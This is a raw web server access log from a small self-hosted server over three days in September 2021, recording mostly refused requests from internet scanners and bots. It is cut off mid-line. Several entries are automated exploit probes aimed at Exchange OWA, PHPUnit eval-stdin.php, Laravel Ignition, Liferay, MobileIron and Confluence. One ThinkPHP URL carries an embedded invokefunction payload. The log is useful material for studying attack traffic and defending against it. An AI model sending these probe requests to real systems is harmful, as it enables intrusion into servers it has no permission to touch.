64.22.31.253 "/" [Client 45.155.204.251] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36" "-" [16/Sep/2021:16:46:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.209.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [16/Sep/2021:17:02:07 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [16/Sep/2021:17:02:07 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [16/Sep/2021:17:02:08 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [16/Sep/2021:17:02:08 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [16/Sep/2021:17:02:08 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [16/Sep/2021:17:02:08 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [16/Sep/2021:17:57:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.83.65.53] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [16/Sep/2021:19:45:19 +0000] 400 - GET https localhost "/" [Client 167.99.133.28] [Length 154] [Gzip -] "-" "-" [16/Sep/2021:19:45:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.99.133.28] [Length 0] [Gzip -] "l9tcpid/v1.1.0" "-" [16/Sep/2021:20:13:57 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [16/Sep/2021:22:50:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 188.166.171.193] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [16/Sep/2021:22:50:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 188.166.171.193] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [16/Sep/2021:23:08:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.116] [Length 0] [Gzip -] "-" "-" [16/Sep/2021:23:08:38 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.116] [Length 252] [Gzip -] "-" "-" [16/Sep/2021:23:08:38 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.116] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [16/Sep/2021:23:10:11 +0000] 444 - GET https 64.22.31.253 "/api/system" [Client 192.168.1.1] [Length 0] [Gzip -] "okhttp/4.9.0" "-" [16/Sep/2021:23:42:04 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.220.167] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Sep/2021:00:06:59 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.207.42] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Sep/2021:00:10:01 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.209.88] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Sep/2021:00:12:20 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.216.61] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Sep/2021:00:16:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.194] [Length 0] [Gzip -] "-" "-" [17/Sep/2021:00:16:46 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.194] [Length 252] [Gzip -] "-" "-" [17/Sep/2021:00:16:46 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.194] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [17/Sep/2021:00:54:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 216.218.206.69] [Length 0] [Gzip -] "-" "-" [17/Sep/2021:03:17:57 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.207.60] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Sep/2021:03:32:16 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.96] [Length 0] [Gzip -] "-" "-" [17/Sep/2021:03:32:18 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.96] [Length 252] [Gzip -] "-" "-" [17/Sep/2021:03:32:18 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.96] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [17/Sep/2021:03:49:01 +0000] 444 - GET https agent.moralanimal.net "/" [Client 61.135.15.169] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 10.0; MI 2 Build/O012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4472.114 Mobile Safari/537.36" "-" [17/Sep/2021:04:16:17 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Sep/2021:04:16:17 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Sep/2021:04:29:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 143.198.155.206] [Length 0] [Gzip -] "-" "-" [17/Sep/2021:04:29:18 +0000] 400 - - https localhost "-" [Client 143.198.155.206] [Length 154] [Gzip -] "-" "-" [17/Sep/2021:04:29:19 +0000] 400 - - http localhost "-" [Client 143.198.155.206] [Length 154] [Gzip -] "-" "-" [17/Sep/2021:04:29:29 +0000] 400 - - https localhost "-" [Client 143.198.155.206] [Length 0] [Gzip -] "-" "-" [17/Sep/2021:04:29:31 +0000] 444 - GET https 64.22.31.253 "/favicon.ico" [Client 143.198.155.206] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [17/Sep/2021:04:29:32 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 143.198.155.206] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [17/Sep/2021:04:29:33 +0000] 444 - GET https 64.22.31.253 "/sitemap.xml" [Client 143.198.155.206] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [17/Sep/2021:05:30:59 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Sep/2021:05:30:59 +0000] 444 - GET https router.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Sep/2021:05:58:04 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [17/Sep/2021:05:59:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 212.71.245.35] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0" "-" [17/Sep/2021:06:06:44 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [17/Sep/2021:06:50:06 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.129.64.142] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [17/Sep/2021:06:50:11 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 185.107.47.171] [Length 0] [Gzip -] "-" "-" [17/Sep/2021:06:50:12 +0000] 400 - - https localhost "-" [Client 23.129.64.142] [Length 154] [Gzip -] "-" "-" [17/Sep/2021:06:50:14 +0000] 444 - OPTIONS https localhost "/" [Client 23.129.64.142] [Length 0] [Gzip -] "-" "-" [17/Sep/2021:06:50:20 +0000] 400 - - https localhost "-" [Client 23.129.64.142] [Length 154] [Gzip -] "-" "-" [17/Sep/2021:06:50:29 +0000] 400 - GET http 64.22.31.253 "/" [Client 66.220.242.222] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [17/Sep/2021:07:17:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 104.140.188.34] [Length 0] [Gzip -] "https://gdnplus.com:Gather Analyze Provide." "-" [17/Sep/2021:07:19:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.215.78] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Sep/2021:08:18:32 +0000] 400 - GET http 64.22.31.253 "/" [Client 185.220.100.254] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [17/Sep/2021:09:47:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 71.6.232.7] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" "-" [17/Sep/2021:10:54:45 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Sep/2021:10:54:46 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Sep/2021:12:23:37 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.221.22] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Sep/2021:13:35:54 +0000] 444 - GET https localhost "/" [Client 178.73.215.171] [Length 0] [Gzip -] "-" "-" [17/Sep/2021:13:43:20 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Sep/2021:13:43:20 +0000] 444 - GET https tpm.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Sep/2021:14:03:05 +0000] 444 - GET https 64.22.31.253 "/remote/login" [Client 185.180.143.71] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [17/Sep/2021:15:08:12 +0000] 444 - GET https 64.22.31.253 "/bag2" [Client 139.162.145.250] [Length 0] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)" "-" [17/Sep/2021:15:31:05 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Sep/2021:15:31:05 +0000] 444 - GET https oauth.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Sep/2021:15:46:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 88.9.119.217] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [17/Sep/2021:16:26:41 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Sep/2021:16:26:41 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Sep/2021:16:26:42 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Sep/2021:16:26:42 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Sep/2021:16:26:43 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Sep/2021:16:26:45 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [17/Sep/2021:16:26:48 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Sep/2021:16:26:49 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Sep/2021:16:26:50 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Sep/2021:16:26:54 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Sep/2021:16:26:54 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Sep/2021:16:26:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [17/Sep/2021:17:32:29 +0000] 400 - GET http 64.22.31.253 "/adminer.php" [Client 45.144.227.9] [Length 252] [Gzip -] "Mozilla/5.0 UniversityProject/2.9" "-" [17/Sep/2021:17:35:37 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Sep/2021:17:35:37 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Sep/2021:18:31:36 +0000] 400 - GET http 64.22.31.253 "/" [Client 209.141.53.166] [Length 252] [Gzip -] "Linux Gnu (cow)" "-" [17/Sep/2021:19:02:18 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Sep/2021:19:02:18 +0000] 444 - GET https home.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Sep/2021:19:32:48 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Sep/2021:19:32:48 +0000] 444 - GET https io.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Sep/2021:20:31:39 +0000] 444 - POST https 64.22.31.253 "/pages/createpage-entervariables.action?SpaceKey=x" [Client 191.232.38.25] [Length 0] [Gzip -] "python-requests/2.18.4" "-" [17/Sep/2021:20:34:41 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.58] [Length 0] [Gzip -] "-" "-" [17/Sep/2021:20:34:43 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.58] [Length 252] [Gzip -] "-" "-" [17/Sep/2021:20:34:43 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.58] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [17/Sep/2021:20:38:56 +0000] 400 - - http localhost "-" [Client 179.60.150.88] [Length 154] [Gzip -] "-" "-" [17/Sep/2021:20:45:17 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [17/Sep/2021:20:45:17 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [17/Sep/2021:20:45:17 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [17/Sep/2021:20:45:17 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [17/Sep/2021:20:45:17 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [17/Sep/2021:20:45:17 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [17/Sep/2021:21:04:51 +0000] 444 - GET https speedtest.moralanimal.net "/" [Client 92.118.160.5] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [17/Sep/2021:21:23:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 143.198.35.124] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [17/Sep/2021:21:32:45 +0000] 400 - GET http 64.22.31.253 "/" [Client 209.141.53.166] [Length 252] [Gzip -] "Linux Gnu (cow)" "-" [17/Sep/2021:21:34:57 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Sep/2021:21:34:57 +0000] 444 - GET https sql.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Sep/2021:21:54:52 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Sep/2021:21:54:52 +0000] 444 - GET https booksonic.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [17/Sep/2021:22:32:00 +0000] 444 - GET https help.moralanimal.net "/" [Client 34.96.130.10] [Length 0] [Gzip -] "Expanse indexes the network perimeters of our customers. If you have any questions or concerns, please reach out to: scaninfo@expanseinc.com" "-" [17/Sep/2021:22:37:30 +0000] 400 - GET http 64.22.31.253 "/" [Client 209.141.53.166] [Length 252] [Gzip -] "Linux Gnu (cow)" "-" [17/Sep/2021:22:45:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.94.138.60] [Length 0] [Gzip -] "-" "-" [17/Sep/2021:22:45:14 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.60] [Length 252] [Gzip -] "-" "-" [17/Sep/2021:22:45:14 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.94.138.60] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [18/Sep/2021:00:10:02 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.209.88] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Sep/2021:00:11:45 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.213.50] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Sep/2021:00:13:09 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.221.174] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Sep/2021:00:15:29 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.32] [Length 0] [Gzip -] "-" "-" [18/Sep/2021:01:42:09 +0000] 400 - GET http 64.22.31.253 "/" [Client 209.141.53.166] [Length 252] [Gzip -] "Linux Gnu (cow)" "-" [18/Sep/2021:01:42:57 +0000] 400 - - http localhost "-" [Client 179.60.150.88] [Length 154] [Gzip -] "-" "-" [18/Sep/2021:01:46:15 +0000] 400 - - http localhost "-" [Client 92.118.36.18] [Length 154] [Gzip -] "-" "-" [18/Sep/2021:03:28:56 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.207.100] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Sep/2021:03:53:57 +0000] 444 - GET https 64.22.31.253 "/" [Client 180.149.125.175] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36" "-" [18/Sep/2021:04:04:11 +0000] 400 - GET http 64.22.31.253 "/" [Client 209.141.53.166] [Length 252] [Gzip -] "Linux Gnu (cow)" "-" [18/Sep/2021:05:31:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.33.96.205] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [18/Sep/2021:07:25:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.215.36] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [18/Sep/2021:10:22:23 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Sep/2021:10:22:23 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Sep/2021:10:22:25 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Sep/2021:10:22:25 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Sep/2021:10:22:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Sep/2021:10:22:26 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Sep/2021:10:22:30 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Sep/2021:10:22:30 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Sep/2021:10:22:31 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [18/Sep/2021:10:22:32 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; 